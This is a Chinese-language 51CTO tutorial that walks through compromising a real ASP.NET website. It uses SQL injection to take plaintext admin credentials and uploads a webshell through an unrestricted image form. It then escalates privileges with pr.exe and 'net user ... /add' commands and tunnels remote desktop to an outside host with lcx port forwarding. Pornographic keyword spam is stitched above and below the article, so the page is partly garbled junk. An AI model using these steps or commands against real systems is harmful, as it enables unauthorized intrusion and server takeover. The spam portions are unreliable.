精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

實例:Public權限滲透某asp.net網站

原創
安全
對于數據庫用戶權限為Public的網站滲透相對較難,設置為這種權限,多數具有較高的安全意識,在通過SQL注入點獲取是Public權限時,需要多方分析,嘗試各種方法進行滲透測試,但不管如何,存在SQL注入點就是一種突破,通過SQL注入能夠獲取網站數據庫的一些信息,通過這些信息再次進行滲透和提權就相對會容易一些。

【51CTO.com 獨家特稿】本文知識要點:

(1)使用Google搜索管理后臺真實地址

(2)LCX端口轉發程序突破內網限制

(3)Asp.net類網站的滲透思路

對于數據庫用戶權限為Public的網站滲透相對較難,設置為這種權限,多數具有較高的安全意識,在通過SQL注入點獲取是Public權限時,需要多方分析,嘗試各種方法進行滲透測試,但不管如何,存在SQL注入點就是一種突破,通過SQL注入能夠獲取網站數據庫的一些信息,通過這些信息再次進行滲透和提權就相對會容易一些。尤其是在獲得網站后臺管理員權限的情況下,通過文件包含、數據庫備份、圖片上傳、文件上傳、插入一句話等來獲取Webshell。下面就以一個實際案例來分析如何利用Public權限滲透某asp.net網站。

1.尋找SQL注入點

通過查看網站的各個頁面,尋找有參數傳入的頁面,在有參數的頁面中進行出錯判斷,如圖1所示,在傳出參數typeid=1后面附加"'"使其自動爆出錯誤,通過該錯誤信息可以知道數據庫為MSSQL。

圖1 獲取SQL注入點

圖1 獲取SQL注入點

2.使用各種SQL注入工具進行信息收集和數據猜測

對于Asp.net類型網站除了一些大型商業專用滲透工具外,還有一些免費的工具,例如Pangolin、Havij、Domain3.5、HDSI2.5以及啊D等SQL注入工具。在本次滲透過程中先后使用了Pangolin、Havij,如圖2所示,使用Havij1.2免費版本測試效果并不好,未能獲取更多的信息。

圖2 使用Havij進行SQL注入滲透測試

圖2 使用Havij進行SQL注入滲透測試#p#

技巧

(1)在發現SQL注入點后一般先使用一些自動測試工具進行測試,在測試時可以依次使用多個工具進行測試,雖然這些SQL注入工具功能大致相同,但在某些場景下,使用有些工具能夠成功,然而使用某些工具就不一定成功。

(2)先工具后手工,事后進行總結加深對滲透到理解,并將有用的技巧收集整理。

3.使用Domain3.5檢測到目標網站存在SQL注入點

打開Domain3.5 SQL注入工具,單擊"SQL注入"-"SQL注入猜解檢測",將剛才測試所出錯前的正常頁面地址復制到"注入點"中,然后單擊"開始檢測",如果該注入點能夠進行SQL注入,則會在檢測信息中顯示詳細信息,如圖3所示,獲取該數據庫是MSSQL,當前數據庫以及當前權限等信息。

圖3 檢測SQL注入點

圖3 檢測SQL注入點

4.猜解數據庫中的表和表中的數據

這一步是SQL注入檢測中最重要的一步,如果能夠成功,就意味中可以查看和修改數據庫中的數據,單擊"猜解表名"猜解數據庫中一共有多少表,在本例中一共有33個表,然后查看數據庫表名稱來判斷哪個表是保存有管理員用戶名和密碼的,確定并選中,然后單擊"猜解列名"來獲取表中的具體列名,然后選擇需要查看內容的列名,最后單擊"猜解內容"來獲取其相應信息,如圖4所示,獲取了管理員的密碼,而且管理員的密碼是明文的未加密!

圖4 獲取數據內容

圖4 獲取數據內容#p#

5.掃描和獲取后臺地址

在Domain3.5中單擊"管理入口掃描"來獲取管理入口的具體地址,在本例中通過Domain3.5未能獲取管理后臺地址,這時候就需要動用其他方法,一個比較好的方法就是利用搜索引擎,使用"site:somesite.com 登錄"或者"site:somesite.com 系統管理"等來搜索后臺地址,如圖5所示,獲取了后臺的詳細地址。

圖5獲取后臺登陸地址

圖5 獲取后臺登陸地址

6.登錄測試和驗證

直接打開從搜索引擎中獲取的后臺地址,如果能夠正常訪問說明該頁面可能是真正的后臺地址,如圖6所示,該頁面能夠正常訪問,且通過頁面信息可以判定該地址就是管理后臺地址,輸入剛才獲取的用戶名和密碼進行測試, 登錄成功,如圖7所示。

圖6 后臺地址測試和驗證

圖6 后臺地址測試和驗證#p#

圖7 后臺登錄成功

圖7 后臺登錄成功

7.尋找、測試和獲取Webshell

(1)獲得圖片上傳頁面

當使用SQL注入工具或者手工注入獲得管理員的用戶名和密碼成功登錄系統后,需要查看系統信息發布等模塊,查看是否存在文件上傳部分,如果沒有,則嘗試插入一句話進行后臺備份等操作。在本次滲透過程中通過查看后臺的各個功能模塊,發現有四個信息添加模塊,在新建會員模塊中存在上傳圖片模塊,單擊鏈接進入新建會員模塊,如圖8所示,在圖片中直接選擇一個asp.net的Webshell,然后上傳。上傳結果顯示成功,如圖9所示。

圖8 獲得文件上傳模塊

圖8 獲得文件上傳模塊

圖9 文件上傳成功

圖9 文件上傳成功#p#

(2)查看文件上傳的真實地址

雖然頁面顯示文件上傳成功,但還需要找到文件上傳的真正地址,核對上傳的文件是否更改了后綴,新建會員后,需要從前臺來查看剛才添加到效果,如圖10所示,找到會員列表,然后尋找最后添加到記錄。

圖10 通過前臺查看上傳圖片

圖10 通過前臺查看上傳圖片

對于網站CMS系統處理新添加記錄有兩種結果,一種是按照最新時間排序,另外一種是降序,因此在翻看記錄時,需要分析數據添加的規律,在本例中就是按照時間升序排序,即最早添加的最先顯示,因此需要跳轉到頁碼最大處才能看到剛才添加的記錄,如圖11所示,右鍵選中圖片,查看圖片屬性,從而獲取該圖片的真實地址,上傳模塊未對上傳文件后綴等進行限制,上傳文件一律按照時間(年月日分秒)+原真實上傳文件名稱進行命名。

圖11 獲取圖片的真實地址

圖11 獲取圖片的真實地址#p#

(3)獲取Webshell

在IE瀏覽器中打開上傳Webshell的真實地址,如圖12所示,輸入Webshell的密碼后,出現熟悉的Asp.net Webshell界面。

圖12 成功獲得該網站的Webshell

圖12 成功獲得該網站的Webshell

8.嘗試提權

通過Webshell查看該服務器安裝程序和網站文件等,然后利用掌握的信息進行提權,在本次滲透過程中發現該服務器為內網服務器,通過防火墻映射到外網,對外僅僅開放了80端口,在網絡地址中未配置DNS,系統中無可提權的其他可用信息。因此首先嘗試使用pr進行提權。如圖13所示,先將pr程序上傳到回收站中,然后分別執行"E:\RECYCLER\pr.exe ", 參數"net user temp temp2005 /add",參數"net localgroup administrator temp /add"。執行結果顯示"命令成功完成",表示pr提權成功。

圖13使用pr提權

圖13使用pr提權#p#

9.登錄遠程桌面

(1)查看添加到用戶

在Webshell中通過CMDShell查看剛才添加的用戶是否成功,如圖14所示,可以看到系統已經添加了一個temp的管理員用戶。

圖14 查看添加到用戶

圖14 查看添加到用戶

(2)使用lcx進行端口轉發

在具有獨立IP的計算機上執行"lcx -listen 51 2008",意思是監聽51端口,并將51端口映射到本機的2008端口。

圖15 使用lcx進行端口監聽

圖15 使用lcx進行端口監聽#p#

在Webshell中執行"E:\RECYCLER\lcx.exe",參數設置為"-slave 202.XXX.XXX.XXX 51 172.30.11.81 3389",意思是連接IP地址202.XXX.XXX.XXX的51端口,將服務器內網地址為172.30.11.81的3389端口轉發到202.XXX.XXX.XXX的51端口上。

圖16使用lcx進行端口轉發

圖16使用lcx進行端口轉發

(3)連接遠程桌面

在監聽51端口的計算機中打開遠程終端登錄界面,然后輸入"127.0.0.1:2008"進行登錄,輸入剛才添加到temp用戶和密碼,如圖17所示,成功登錄系統,從而獲得服務器權限,成功滲透該服務器。

圖17成功進入系統

圖17成功進入系統

小結

1.對于Asp.net的滲透思路

(1)掃描目標網站,獲取SQL注入點或者其它漏洞。掃描目標網站可以使用一些商業掃描軟件,例如wvs,appscan,webinspect,jsky,極光等。通過掃描獲取網站程序漏洞和配置漏洞。在掃描結果中有關單獨的上傳頁面、上傳組件(各種WebEditor)、網站壓縮文件、bak備份文件的利用是重點。

(2)利用掃描結果信息進行滲透測試。

(3)獲取Webshell。獲取Webshell較多的方法是通過上傳,以及各類Web編輯器的漏洞,還有某一類程序的漏洞,當然這些漏洞的利用需要一些輔助條件。某些網站在被入侵后,入侵者會將整個網站進行打包,下載完畢后未刪除,如果能夠成功將其下載,對于分析漏洞和獲取Webshell很有幫助。

(4)對服務器進行提權。對服務器提權主要是看服務器上安裝有哪些程序,然后采取相對應的提權方法,例如讀取VNC密碼,讀取Radmin密碼,下載Pcanywhere密碼保存文件,利用Serv-u直接添加用戶,利用系統未安裝補丁程序進行本地提權,編寫autorun.inf病毒,導出腳本到啟動添加用戶,MSSQL SA權限直接添加系統用戶,Mysql udf函數提權等。

2.在擁有Webshell情況下,利用LCX端口轉發實現內網突破效果還是不錯的。

3.在使用SQL注入工具掃描不出后臺的情況下,可以嘗試通過Google搜索來獲取后臺真實地址。

【51CTO.com獨家特稿,非經授權謝絕轉載!合作媒體轉載請注明原文出處及出處!】

【編輯推薦】

  1. 名為LizaMoon的SQL注入攻擊正在席卷全球
  2. MySQL.com被SQL注入攻擊 用戶密碼數據被公布
  3. 使用Metasploit對思科IOS進行滲透測試
  4. 滲透測試:確保計劃成功的10個秘訣
責任編輯:佟健 來源: 51CTO.com
相關推薦

2009-07-29 09:14:36

ASP.NET網站

2009-07-27 14:24:16

ASP.NET訪問權限

2009-08-05 17:58:34

實現ASP.NET網站

2009-09-03 16:27:57

ASP.NET回車事件

2009-08-05 15:39:57

文件夾權限設置

2009-07-28 17:17:19

ASP.NET概述

2009-08-03 14:22:33

什么是ASP.NET

2009-07-22 17:45:35

ASP.NET教程

2009-07-27 17:20:05

2009-12-07 09:23:05

ASP.NET MVC

2009-07-29 15:55:48

ASP.NET Req

2009-09-09 22:53:34

ASP.NET 時間控

2009-07-24 15:07:56

ASP.NET上傳文件

2009-07-27 12:22:03

ASP.NET和ASPASP.NET入門教程

2009-08-05 15:10:04

ASP.NET網站設置

2011-06-28 15:14:10

ASP.NET性能優化

2009-07-28 17:15:17

ASP.NET權限管理

2009-07-29 09:12:31

ASP.NET數據庫連

2009-07-28 15:08:50

MVC三層架構實例

2009-07-28 11:34:02

ASP.NET架設
點贊
收藏

51CTO技術棧公眾號

色播色播色播色播色播在线| 日韩不卡视频在线| 婷婷久久久久久| 国产欧美日韩一区二区三区在线| 欧美日韩一区二区三区四区| 一区二区不卡视频| 国产在线观看黄色| 亚洲精品一区在线| 狠狠久久五月精品中文字幕| 亚洲国产日韩美| 北条麻妃一二三区| 手机精品视频在线观看| 亚洲精品国精品久久99热| www.亚洲天堂网| 国产激情小视频在线| 成人午夜视频网站| 成人妇女免费播放久久久| 豆国产97在线 | 亚洲| 欧美三级伦理在线| 在线影院国内精品| 丁香色欲久久久久久综合网| 国产精品99999| 成人app下载| 国产欧美一区二区白浆黑人| 圆产精品久久久久久久久久久| 欧美a级成人淫片免费看| 亚洲国产中文字幕在线观看| 91免费视频污| 麻豆传媒在线完整视频| 91在线国内视频| 91一区二区三区| 自拍偷拍精品视频| 亚洲在线国产日韩欧美| 色综合久久88| 91人妻一区二区三区蜜臀| 国产精品一区高清| 亚洲黄页视频免费观看| 色哟哟在线观看视频| 成人国产精选| 欧美一a一片一级一片| 内射国产内射夫妻免费频道| 亚洲人妻一区二区| 国产传媒欧美日韩成人| 91精品综合久久久久久五月天| 波多野结衣家庭主妇| 国产一级一区二区| 97久久久免费福利网址| 日本一区二区三区四区五区| 国模吧视频一区| 久久99精品久久久久久噜噜| 伊人在线视频观看| 国产精品99久久久久久动医院| 亚洲欧美视频在线| 日韩人妻无码精品综合区| 日韩福利视频一区| 亚洲加勒比久久88色综合| 2一3sex性hd| 欧美freesex8一10精品| 亚洲国产精品中文| 国产精品一区二区无码对白| 国产粉嫩在线观看| 亚洲第一av色| 国产精品一区二区免费在线观看| 深夜成人在线| 色哟哟欧美精品| 男女视频一区二区三区| 看片一区二区| 91精品国产综合久久久久| 色偷偷中文字幕| 亚洲成人偷拍| 日韩禁在线播放| 成人免费无遮挡无码黄漫视频| 国产在线日韩精品| 色偷偷噜噜噜亚洲男人的天堂| 免费在线观看黄色小视频| 自拍偷拍欧美专区| 亚洲男女自偷自拍图片另类| 国产中年熟女高潮大集合| 欧美日韩一区二区三区视频播放| 日韩在线观看免费av| 草视频在线观看| aa国产精品| 国产精品91久久久久久| 97精品人妻一区二区三区| 国产成人精品免费视频网站| 好吊色欧美一区二区三区视频| 一级黄色片在线播放| 国产一区不卡精品| 国产一区免费在线| 国产一区免费| 人妻视频一区二区| 日本道不卡免费一区| 久久久黄色av| 日日夜夜综合网| 美日韩一区二区三区| 亚洲综合中文字幕68页| 在线观看亚洲天堂| 日本午夜精品一区二区三区电影| 成人精品福利视频| 日韩中文字幕免费在线观看| 国产欧美日本一区二区三区| 永久免费网站视频在线观看| 一二三四视频在线中文| 亚洲影院理伦片| 玩弄japan白嫩少妇hd| 国产精品一区二区三区四区在线观看 | 免费福利视频一区二区三区| 欧美日韩精品二区第二页| 久久久久久久久久久久国产精品| 国产欧美亚洲精品a| 欧美大胆在线视频| 日韩综合在线观看| 成人久久视频在线观看| 亚洲 国产 欧美一区| 日本高清中文字幕二区在线| 国产精品成人在线观看| 色综合视频二区偷拍在线| 中文字幕中文字幕在线中高清免费版| 欧美性猛交xxxx| 好吊操视频这里只有精品| 欧美偷拍综合| 欧美在线观看网站| 亚洲国产精品二区| 中文字幕一区二区在线观看| 精品人妻一区二区三区四区在线| 日韩中文一区二区| 中文字幕亚洲无线码a| 国产专区第一页| 成人国产在线观看| 欧美一级中文字幕| 欧美人与禽性xxxxx杂性| 欧美性极品少妇| 最新中文字幕视频| 99精品久久| 99se婷婷在线视频观看| 素人av在线| 欧美午夜宅男影院| av在线网站观看| 亚洲午夜视频| 成人三级在线| 激情网站在线| 日韩欧美亚洲一区二区| 亚洲精品久久久久久国| 久久精品国产99国产| 亚洲成人自拍视频| av成人在线看| 最近2019年日本中文免费字幕| 成人黄色激情视频| 国产清纯白嫩初高生在线观看91 | 毛片一区二区三区| 日韩久久精品一区二区三区| 中文字幕在线视频久| 日韩av在线一区| 国产无套丰满白嫩对白| 99r精品视频| 欧美美女激情18p| 911亚洲精选| 亚洲精品一二| 欧美性xxxx69| 欧美暴力调教| 色狠狠久久aa北条麻妃| 国产一区二区在线播放视频| 日韩美女视频一区| 奇米777在线| 亚洲大片在线| 麻豆成人小视频| 校园春色亚洲色图| 欧美系列亚洲系列| 美女av免费看| 国内精品自线一区二区三区视频| 国产精品一区二区av| 成人av影院在线观看| 亚洲国产成人一区| 男人av资源站| 国产成人av福利| 成人一区二区免费视频| 亚洲视频分类| 国产精品尤物福利片在线观看| 毛片在线播放a| 欧美xxxxx牲另类人与| 51国产偷自视频区视频| 国产免费久久精品| 一卡二卡三卡四卡五卡| 亚洲另类自拍| 婷婷久久伊人| youjizz欧美| 久久亚洲一区二区三区四区五区高| 日韩少妇高潮抽搐| 久久久久久久久99精品| 小明看看成人免费视频| 一区在线观看| 五码日韩精品一区二区三区视频| 另类视频一区二区三区| 欧美性资源免费| 巨大荫蒂视频欧美另类大| 亚洲第一av在线| 亚洲精品国产精品乱码视色| 一区二区三区在线免费| 国产熟妇久久777777| 在线欧美不卡| 亚洲欧美电影在线观看| 成午夜精品一区二区三区软件| 国产国产精品人在线视| 日韩专区av| 在线观看日韩av| 日本激情一区二区| 欧美日韩国产美| 久久久成人免费视频| 亚洲精品福利视频网站| 少妇人妻好深好紧精品无码| 风流少妇一区二区| 天天干天天av| 免费永久网站黄欧美| 国产在线无码精品| 日韩黄色大片| 欧美日本亚洲| 开心激情综合| 不卡一区二区三区视频| www.久久久.com| 国产精品福利小视频| 久久影院午夜精品| 九九热精品视频在线播放| eeuss影院www在线播放| 亚洲片av在线| 日韩偷拍自拍| 亚洲福利视频网站| 国产高潮流白浆喷水视频| 欧美日韩一级片网站| www.久久久久久久| 欧美日韩中文在线| 国产午夜激情视频| 亚洲最大成人网4388xx| 欧美精品一区二区蜜桃| 综合久久给合久久狠狠狠97色| 国产黄色大片免费看| 久久久久国产精品麻豆| 18禁裸乳无遮挡啪啪无码免费| 91在线国产观看| 中文字幕天堂网| 懂色av一区二区三区免费看| 九色91porny| 国产99久久精品| 黄页网站在线看| 丰满亚洲少妇av| 少妇一级淫片免费放播放| 成人国产在线观看| av在线播放网址| av电影天堂一区二区在线观看| 亚洲性图第一页| 国产成人av福利| 国模无码视频一区| 成人黄页毛片网站| 国产国语性生话播放| 2023国产精品| 国产熟女一区二区| 国产精品毛片a∨一区二区三区| 日本二区三区视频| 亚洲视频在线观看一区| 亚洲最大的黄色网址| 国产精品国产三级国产| www深夜成人a√在线| 一区二区在线看| 国产成人无码精品亚洲| 日韩欧美精品在线观看| 波多野结衣网站| 欧美巨大另类极品videosbest| 国产精品区在线观看| 欧美大片在线观看| 熟妇高潮一区二区三区| 亚洲人成电影网站色www| 国产视频三级在线观看播放| 视频一区视频二区国产精品| 3d玉蒲团在线观看| 亚州欧美日韩中文视频| 色香欲www7777综合网| 成人伊人精品色xxxx视频| 亚洲一级大片| 欧美一区二区三区精美影视| 色中色综合网| 久久久亚洲国产精品| 性欧美xxxx大乳国产app| the porn av| 国产精品12区| 三上悠亚ssⅰn939无码播放| 国产精品美女久久久久aⅴ国产馆| 精国产品一区二区三区a片| 精品日韩美女的视频高清| 成人黄色免费网| 亚洲第一天堂av| av国产在线观看| 韩国国内大量揄拍精品视频| 欧美日韩视频免费观看| 99久久久久国产精品免费| 在线成人动漫av| 天天想你在线观看完整版电影免费 | 日韩av有码在线| 欧洲不卡av| 欧美亚洲一区在线| 超碰国产精品一区二页| 国产综合第一页| 国产精品久久久久久久| 成人av一级片| 国产成人一区在线| 久久久久亚洲AV成人无在| 亚洲国产日韩一级| 一本一道人人妻人人妻αv| 亚洲成人精品av| а√资源新版在线天堂| 日韩av免费在线| 风间由美性色一区二区三区四区 | 99久久久无码国产精品不卡| 亚洲一二三区视频在线观看| 亚洲熟女乱色一区二区三区久久久| 精品国产乱码久久久久久牛牛| 一区二区三区视频在线观看视频| 97avcom| 日韩中文字幕在线一区| 亚洲人久久久| 久久性天堂网| 三级电影在线看| 亚洲午夜影视影院在线观看| 国产精品欧美综合亚洲| 永久555www成人免费| 成人免费直播| 精品国产乱码久久久久| 国产在线日韩| 在线观看免费看片| 亚洲色图视频网| 一道本无吗一区| 搡老女人一区二区三区视频tv| 久久久久久久| 欧美三日本三级少妇三99| 鲁大师影院一区二区三区| 在线精品一区二区三区| 午夜精品影院在线观看| 成人免费视频国产免费麻豆| 欧美mv日韩mv亚洲| 成人在线直播| 成人有码在线视频| 国产精品97| 亚洲一二三av| 亚洲欧洲精品一区二区精品久久久 | 日本天堂在线观看| 国产精品视频网| 日韩在线二区| 一区二区在线免费看| 中文字幕在线观看一区二区| 91精品视频免费在线观看| 中文字幕日本精品| 欧美日韩伦理一区二区| 一道精品一区二区三区| 日本在线不卡视频一二三区| 五月婷婷婷婷婷| 3751色影院一区二区三区| 国产精品刘玥久久一区| 亚洲xxx大片| 亚洲香蕉网站| 天堂久久久久久| 色婷婷激情久久| 国产视频第一页在线观看| 国产精品三级网站| 我不卡神马影院| 麻豆av免费看| 亚洲成av人综合在线观看| 日本成人一区| 国产精品视频在线播放| 午夜影院欧美| 黄色在线免费播放| 色综合久久99| 老司机在线看片网av| 成人看片视频| 久久国产毛片| 在线观看黄网址| 亚洲二区中文字幕| yw.尤物在线精品视频| 日本xxxxx18| 日韩电影一二三区| 天天操天天摸天天舔| 精品动漫一区二区三区在线观看| 亚洲少妇视频| 欧美aaa在线观看| 不卡欧美aaaaa| 国产精品sm调教免费专区| 欧美成人精品不卡视频在线观看| 日韩电影不卡一区| 17c国产在线| 午夜精品国产更新| 日本中文字幕在线观看| 福利视频久久| 裸体在线国模精品偷拍| 日韩精品人妻中文字幕| 尤物精品国产第一福利三区| 91蝌蚪精品视频| 欧美日韩大尺度| 亚洲色欲色欲www在线观看| 可以直接在线观看的av| 91高清视频免费| 亚洲成人二区| 日本激情小视频| 欧美不卡激情三级在线观看|